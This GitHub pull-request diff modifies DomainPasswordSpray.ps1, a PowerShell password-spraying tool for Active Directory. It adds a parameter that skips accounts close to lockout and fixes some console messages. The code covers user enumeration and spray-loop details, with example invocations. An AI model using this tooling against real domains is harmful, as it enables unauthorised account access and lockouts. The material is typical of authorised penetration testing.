Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added 'MinAttemptsUntilLockout' parameter + bugfix #26

Open
wants to merge 4 commits into
base: master
Choose a base branch
from
Open

Added 'MinAttemptsUntilLockout' parameter + bugfix #26

Changes from all commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
22f345a
Added 'MinAttemptsUntilLockout' parameter
martinsohn May 18, 2021
2bfdb5d
Remove irrelevant console line if no output file is specified
martinsohn May 18, 2021
5804a85
Ignore console line if only testing one password
martinsohn May 18, 2021
aa5d139
Missing bracket
martinsohn May 18, 2021
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
43 changes: 31 additions & 12 deletions DomainPasswordSpray.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -46,6 +46,10 @@ function Invoke-DomainPasswordSpray{

For each user, will try that user's name as their password

.PARAMETER MinAttemptsUntilLockout

Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!).

.EXAMPLE

C:\PS> Invoke-DomainPasswordSpray -Password Winter2016
Expand Down Expand Up @@ -109,7 +113,10 @@ function Invoke-DomainPasswordSpray{
$Delay=0,

[Parameter(Position = 9, Mandatory = $false)]
$Jitter=0
$Jitter=0,

[Parameter(Position = 10, Mandatory = $false)]
$MinAttemptsUntilLockout = 2

)

Expand Down Expand Up @@ -155,7 +162,7 @@ function Invoke-DomainPasswordSpray{

if ($UserList -eq "")
{
$UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter
$UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter -MinAttemptsUntilLockout $MinAttemptsUntilLockout
}
else
{
Expand All @@ -174,18 +181,16 @@ function Invoke-DomainPasswordSpray{
}

}

$observation_window = Get-ObservationWindow $CurrentDomain

Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes."

if ($Passwords.count -gt 1)
{
if ($Passwords.count -gt 1) {
Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!"
Write-Host "[*] Setting a $observation_window minute wait in between sprays."
}

$observation_window = Get-ObservationWindow $CurrentDomain

Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes."
Write-Host "[*] Setting a $observation_window minute wait in between sprays."

# if no force flag is set we will ask if the user is sure they want to spray
if (!$Force)
{
Expand Down Expand Up @@ -281,6 +286,10 @@ function Get-DomainUserList

Custom LDAP filter for users, e.g. "(description=*admin*)"

.PARAMETER MinAttemptsUntilLockout

Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!).

.EXAMPLE

PS C:\> Get-DomainUserList
Expand Down Expand Up @@ -313,9 +322,16 @@ function Get-DomainUserList

[Parameter(Position = 3, Mandatory = $false)]
[string]
$Filter
$Filter,

[Parameter(Position = 4, Mandatory = $false)]
$MinAttemptsUntilLockout = 2
)

if($MinAttemptsUntilLockout -eq 1) {
Write-Host -ForegroundColor Red "[*] Warning! 'MinAttemptsUntilLockout' set to 1. This means the attack could target accounts which will be locked upon 1 bad attempt (the attempt you are about to perform)!"
}

try
{
if ($Domain -ne "")
Expand Down Expand Up @@ -455,7 +471,7 @@ function Get-DomainUserList
# if there is more than 1 attempt left before a user locks out
# or if the time since the last failed login is greater than the domain
# observation window add user to spray list
if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -gt 1))
if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -ge $MinAttemptsUntilLockout))
{
$UserListArray += $samaccountname
}
Expand Down Expand Up @@ -503,7 +519,10 @@ function Invoke-SpraySinglePassword
$count = $UserListArray.count
Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())"
$curr_user = 0
Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
if ($OutFile -ne "")
{
Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
}
$RandNo = New-Object System.Random

foreach ($User in $UserListArray)
Expand Down